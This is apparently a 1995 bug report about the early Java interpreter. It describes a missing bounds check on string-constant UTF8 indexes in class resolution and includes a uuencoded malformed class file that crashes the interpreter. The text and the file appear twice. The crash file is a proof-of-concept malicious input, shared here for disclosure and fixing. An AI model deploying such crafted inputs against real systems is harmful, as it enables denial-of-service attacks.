Details
P3 Description
In classinitialize.c:Locked_ResolveClassConstant(),
resolving a string constant does not check if the index to
the UTF8 is valid. Patching the constant table of a .class
file to include a large index for a string constant can cause
the java interpreter to SEGV.
Included below is a uuencoded class file that has been
patched and causes java to crash.
begin 664 test.class
MROZZO@ # "T 'P@Q$@< &P< %@< #P< '@H ! +"0 " H* , "0P &0 =
M# - !H, P %0$ !W!R:6YT;&X! -E<G(! U#;VYS=&%N=%9A;'5E 0 3
M:F%V82]I;R]0<FEN=%-T<F5A;0$ "D5X8V5P=&EO;G,! I3;W5R8V5&:6QE
M 0 %:&5L;&\\! Y,;V-A;%9A<FEA8FQE<P$ !$-O9&4! !4H3&IA=F$O;&%N
M9R]3=')I;F<[*58! !!J879A+VQA;F<O3V)J96-T 0 $;6%I;@$ %BA;3&IA
M=F$O;&%N9R]3=')I;F<[*58! 8\\:6YI=#X! !5,:F%V82]I;R]0<FEN=%-T
M<F5A;3L! !!J879A+VQA;F<O4WES=&5M 0 )=&5S="YJ879A 0 #*"E6 0 $
M=&5S= 4 P @ ) !< & ! !0 5 ( FR <2 ;8
M!K$ $ &0 = $ % !$ 0 ! !2JW BQ ! !$ "
" !P
end
-Theron, 13 Oct 95
resolving a string constant does not check if the index to
the UTF8 is valid. Patching the constant table of a .class
file to include a large index for a string constant can cause
the java interpreter to SEGV.
Included below is a uuencoded class file that has been
patched and causes java to crash.
begin 664 test.class
MROZZO@ # "T 'P@Q$@< &P< %@< #P< '@H ! +"0 " H* , "0P &0 =
M# - !H, P %0$ !W!R:6YT;&X! -E<G(! U#;VYS=&%N=%9A;'5E 0 3
M:F%V82]I;R]0<FEN=%-T<F5A;0$ "D5X8V5P=&EO;G,! I3;W5R8V5&:6QE
M 0 %:&5L;&\\! Y,;V-A;%9A<FEA8FQE<P$ !$-O9&4! !4H3&IA=F$O;&%N
M9R]3=')I;F<[*58! !!J879A+VQA;F<O3V)J96-T 0 $;6%I;@$ %BA;3&IA
M=F$O;&%N9R]3=')I;F<[*58! 8\\:6YI=#X! !5,:F%V82]I;R]0<FEN=%-T
M<F5A;3L! !!J879A+VQA;F<O4WES=&5M 0 )=&5S="YJ879A 0 #*"E6 0 $
M=&5S= 4 P @ ) !< & ! !0 5 ( FR <2 ;8
M!K$ $ &0 = $ % !$ 0 ! !2JW BQ ! !$ "
" !P
end
-Theron, 13 Oct 95